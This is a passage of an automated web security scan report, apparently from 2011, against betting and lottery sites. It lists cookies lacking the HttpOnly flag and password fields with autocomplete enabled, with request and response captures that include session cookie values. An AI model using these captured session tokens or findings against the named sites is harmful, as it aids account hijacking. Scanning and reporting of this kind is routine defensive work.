Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

12.364. http://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thawte.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
v1st=6CA51F7C72FB1FFE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.365. https://www.thawte.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.thawte.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com
v1st=5154A4B37CB7DE69; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.thawte.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thawte.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.366. http://www.verisign.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.367. http://www.visa.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.visa.co.uk
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bbawtpcn=136cb2b4-a76c-43e4-8ee6-1a70f7ccba22; expires=Tue, 15-May-2012 12:45:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.visa.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en.aspx
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=u4ugzq45nptk4bikc3bma4mu; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: bbawtpcn=136cb2b4-a76c-43e4-8ee6-1a70f7ccba22; expires=Tue, 15-May-2012 12:45:16 GMT; path=/
X-FRAME-OPTIONS: SAMEORIGIN
Date: Mon, 16 May 2011 12:45:15 GMT
Content-Length: 127

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fen.aspx">here</a>.</h2>
</body></html>

12.368. http://www.winnings.com/comments/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/comments/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /comments/feed HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 16 May 2011 12:35:39 GMT
ETag: "99b889a9cd748e8b4eca0eb3758d138d",""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:37 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:37 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:38 GMT
Connection: close
Content-Length: 846

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

12.369. http://www.winnings.com/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feed HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 08 Dec 2010 17:36:53 GMT
ETag: "b598834d1cd11660685dd3d70e23d7d7",""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 12:35:10 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:35:10 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:35:12 GMT
Connection: close
Content-Length: 25900

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...

12.370. http://www.winnings.com/how-to-win-money previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/how-to-win-money

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.371. http://www.winnings.com/instant-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/instant-games

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.372. http://www.winnings.com/lottery-scratch-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/lottery-scratch-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.373. http://www.winnings.com/scratch-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/scratch-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.374. http://www.winnings.com/site-map previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/site-map

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site-map HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

12.375. http://www.winnings.com/slots previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/slots

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.376. http://www.winnings.com/wp-admin/admin-ajax.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.winnings.com
Path:	/wp-admin/admin-ajax.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-admin/admin-ajax.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 26 Jul 1997 05:00:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Date: Mon, 16 May 2011 12:35:30 GMT
Connection: close
Content-Length: 2

-1

12.377. http://www.youtube.com/user/CrazyScratchCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/CrazyScratchCom

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=QJdmZX3XHX0; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/CrazyScratchCom HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.378. http://www.youtube.com/user/PostcodeLottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/PostcodeLottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.379. http://www.youtube.com/user/primescratchcards1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/user/primescratchcards1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.380. http://www.youtube.com/v/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/v/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

VISITOR_INFO1_LIVE=VtM0_rUoIeg; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v/ HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13. Password field with autocomplete enabled previous next
There are 166 instances of this issue:

http://affiliates.interwetten.com/
http://bingo.bet365.com/play/en/home/
https://bingo.betsson.com/en/
http://casino.bet365.com/extra/en/online-games/baccarat
http://casino.bet365.com/extra/en/online-games/blackjack
http://casino.bet365.com/extra/en/online-games/live-dealer
http://casino.bet365.com/extra/en/online-games/roulette
http://casino.bet365.com/home/en/
https://casino.betsson.com/en/
http://games.bet365.com/home/en/
https://games.betsson.com/en/
https://livecasino.betsson.com/en/
http://poker.bet365.com/home/en/
https://poker.betsson.com/en/
https://scratch.betsson.com/en/
https://scratch.betsson.com/en/
https://scratch.betsson.com/en/Casino
https://scratch.betsson.com/en/Casino/Bingo-Bonanza
https://scratch.betsson.com/en/Casino/Bubble-Bingo
https://scratch.betsson.com/en/Casino/Disco-Keno
https://scratch.betsson.com/en/Casino/HiLo
https://scratch.betsson.com/en/Casino/Lucky-21
https://scratch.betsson.com/en/Casino/Namaste
https://scratch.betsson.com/en/Casino/Poker-King
https://scratch.betsson.com/en/Casino/Roulette
https://scratch.betsson.com/en/Casino/Royal-Slots
https://scratch.betsson.com/en/Casino/Slot-Super-7
https://scratch.betsson.com/en/Classic
https://scratch.betsson.com/en/Classic/3-Wow
https://scratch.betsson.com/en/Classic/7th-Heaven
https://scratch.betsson.com/en/Classic/Champagne
https://scratch.betsson.com/en/Classic/Golden-Fortune
https://scratch.betsson.com/en/Classic/Happy-Birthday
https://scratch.betsson.com/en/Classic/Jungle-Joy
https://scratch.betsson.com/en/Classic/Neighbors
https://scratch.betsson.com/en/Classic/Spy-Comics
https://scratch.betsson.com/en/Classic/Super-3-Wow
https://scratch.betsson.com/en/Classic/Tiger-Mahjong
https://scratch.betsson.com/en/Classic/Wild-West
https://scratch.betsson.com/en/Classic/XO
https://scratch.betsson.com/en/Default.aspx
https://scratch.betsson.com/en/FAQ
https://scratch.betsson.com/en/Fantasy
https://scratch.betsson.com/en/Fantasy/Cash-Farm
https://scratch.betsson.com/en/Fantasy/Club-Pearl
https://scratch.betsson.com/en/Fantasy/Crazy-Cat
https://scratch.betsson.com/en/Fantasy/Dancing-Domino
https://scratch.betsson.com/en/Fantasy/Fast-Hands
https://scratch.betsson.com/en/Fantasy/Golden-Island
https://scratch.betsson.com/en/Fantasy/Knights-Battle
https://scratch.betsson.com/en/Fantasy/Love-Birds
https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds
https://scratch.betsson.com/en/Fantasy/Master-Mix
https://scratch.betsson.com/en/Fantasy/Memory-Madness
https://scratch.betsson.com/en/Fantasy/Ocean-Pearl
https://scratch.betsson.com/en/Fantasy/Outer-Space
https://scratch.betsson.com/en/Fantasy/Super-Chance
https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale
https://scratch.betsson.com/en/Fantasy/The-Lost-Maya
https://scratch.betsson.com/en/Fantasy/Treasure-Island
https://scratch.betsson.com/en/Fantasy/Zodiac
https://scratch.betsson.com/en/GameHistory
https://scratch.betsson.com/en/Information
https://scratch.betsson.com/en/News
https://scratch.betsson.com/en/OurScratchcards
https://scratch.betsson.com/en/Ourwinners
https://scratch.betsson.com/en/Slots/5th-Avenue
https://scratch.betsson.com/en/Slots/Adventure-Jack
https://scratch.betsson.com/en/Slots/Atlantis
https://scratch.betsson.com/en/Slots/Bon-Apetit
https://scratch.betsson.com/en/Slots/Cafe-Paris
https://scratch.betsson.com/en/Slots/Castle-Slots
https://scratch.betsson.com/en/Slots/Chic-Boutique
https://scratch.betsson.com/en/Slots/Conga-Beat
https://scratch.betsson.com/en/Slots/Egyptian-Magic
https://scratch.betsson.com/en/Slots/Esmeralda
https://scratch.betsson.com/en/Slots/Fair-Play
https://scratch.betsson.com/en/Slots/Fantasia
https://scratch.betsson.com/en/Slots/Grand-Crown
https://scratch.betsson.com/en/Slots/Holiday-Hotel
https://scratch.betsson.com/en/Slots/Ice-Land
https://scratch.betsson.com/en/Slots/Legend-Of-Terra
https://scratch.betsson.com/en/Slots/Monaco-Glamour
https://scratch.betsson.com/en/Slots/Monte-Carlo
https://scratch.betsson.com/en/Slots/Pirates-Paradise
https://scratch.betsson.com/en/Slots/Sakura-Garden
https://scratch.betsson.com/en/Slots/Sea-And-Sun
https://scratch.betsson.com/en/Slots/Sky-Of-Love
https://scratch.betsson.com/en/Slots/Triple-Carnival
https://scratch.betsson.com/en/Slots/Tropical-Fruit
https://scratch.betsson.com/en/Sports/100m-Champion
https://scratch.betsson.com/en/Sports/Bowling
https://scratch.betsson.com/en/Sports/Darts
https://scratch.betsson.com/en/Sports/Goal-Kick
https://scratch.betsson.com/en/Sports/Gone-Fishing
https://scratch.betsson.com/en/Sports/Hippodrome
https://scratch.betsson.com/en/Sports/Ready-Set-Go
https://scratch.betsson.com/en/Sports/Road-Racing
https://scratch.betsson.com/en/Sports/World-Champions
http://twitter.com/PostcodeLottery
http://twitter.com/PrimeScratch
http://twitter.com/crazyscratch
http://twitter.com/ukscratch
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
http://www.bet365.com/extra/en/betting/in-play
http://www.bet365.com/extra/en/betting/live-streaming
http://www.bet365.com/extra/en/mobile/introduction/
http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed
http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back
http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus
https://www.betsson.com/start/en/
https://www.betsson.com/start/is/
https://www.betsson.com/web/en/sportsbook/
http://www.crazyrewards.com/
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/PrimeScratchCards
http://www.facebook.com/WinningsCom
http://www.facebook.com/crazyscratch
http://www.facebook.com/peoplespostcodelottery
http://www.heavenaffiliates.com/
https://www.interwetten.com/Header-Contact
https://www.interwetten.com/Header-Help-FAQ
https://www.interwetten.com/Header-Menu-Casino
https://www.interwetten.com/Header-Menu-Home
https://www.interwetten.com/Header-Menu-Live
https://www.interwetten.com/Header-Menu-Sportsbook
https://www.interwetten.com/Header-Payment-possibilities
https://www.interwetten.com/Header-Tutorials
https://www.interwetten.com/ScriptResource.axd
https://www.interwetten.com/WebResource.axd
https://www.interwetten.com/en/Default.aspx
https://www.interwetten.com/en/american-football-betting
https://www.interwetten.com/en/australian-rules-football-betting
https://www.interwetten.com/en/beach-soccer-betting
https://www.interwetten.com/en/boxing-betting
https://www.interwetten.com/en/casino/default.aspx
https://www.interwetten.com/en/cycling-betting
https://www.interwetten.com/en/darts-betting
https://www.interwetten.com/en/default.aspx
https://www.interwetten.com/en/football-betting
https://www.interwetten.com/en/games/default.aspx
https://www.interwetten.com/en/golf-betting
https://www.interwetten.com/en/handball-betting
https://www.interwetten.com/en/ice-hockey-betting
https://www.interwetten.com/en/livebets
https://www.interwetten.com/en/motorbikes-betting
https://www.interwetten.com/en/online-skillgames
https://www.interwetten.com/en/politics-betting
https://www.interwetten.com/en/rugby-betting
https://www.interwetten.com/en/sailing-betting
https://www.interwetten.com/en/scratch/default.aspx
https://www.interwetten.com/en/ski-alpine-betting
https://www.interwetten.com/en/skill/default.aspx
https://www.interwetten.com/en/sportsbook/default.aspx
https://www.interwetten.com/en/tennis-betting
https://www.interwetten.com/en/volleyball-betting
https://www.interwetten.com/en/water-polo-betting
https://www.interwetten.com/en/winter-games-betting
http://www.postcodelottery.com/MyAccount.htm
http://www.tstglobal.com/
http://www.verisign.co.uk/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

13.1. http://affiliates.interwetten.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://affiliates.interwetten.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://affiliates.interwetten.com/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$txtPassword

Request

GET / HTTP/1.1
Host: affiliates.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://bingo.bet365.com/play/en/home/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://bingo.bet365.com
Path:	/play/en/home/

Issue detail

The page contains a form with the following action URL:

http://bingo.bet365.com/play/en/home/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /play/en/home/ HTTP/1.1
Host: bingo.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.3. https://bingo.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bingo.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://bingo.betsson.com/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/ HTTP/1.1
Host: bingo.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.4. http://casino.bet365.com/extra/en/online-games/baccarat previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/baccarat

Issue detail

The page contains a form with the following action URL:

http://casino.bet365.com/extra/en/online-games/baccarat/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/baccarat HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.5. http://casino.bet365.com/extra/en/online-games/blackjack previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/blackjack

Issue detail

The page contains a form with the following action URL:

http://casino.bet365.com/extra/en/online-games/blackjack/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/blackjack HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.6. http://casino.bet365.com/extra/en/online-games/live-dealer previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/live-dealer

Issue detail

The page contains a form with the following action URL:

http://casino.bet365.com/extra/en/online-games/live-dealer/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/live-dealer HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.7. http://casino.bet365.com/extra/en/online-games/roulette previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/roulette

Issue detail

The page contains a form with the following action URL:

http://casino.bet365.com/extra/en/online-games/roulette/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/roulette HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.8. http://casino.bet365.com/home/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/home/en/

Issue detail

The page contains a form with the following action URL:

http://casino.bet365.com/home/en/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.9. https://casino.betsson.com/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://casino.betsson.com
Path:	/en/

Issue detail

The page contains a form with the following action URL:

https://casino.betsson.com/en/

The form contains the following password field with autocomplete enabled:

tbPassword

Request

GET /en/ HTTP/1.1
Host: casino.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: QuickSearchLocation=0; expires=Mon, 30-Apr-2012 12:14:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:14:14 GMT
Connection: close
Content-Length: 161996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.10. http://games.bet365.com/home/en/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://games.bet365.com
Path:	/home/en/

Issue detail

The page contains a form with the following action URL:

http://games.bet365.com/home/en/Default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /home/en/ HTTP/1.1
Host: games.bet365.com
Accept: */*
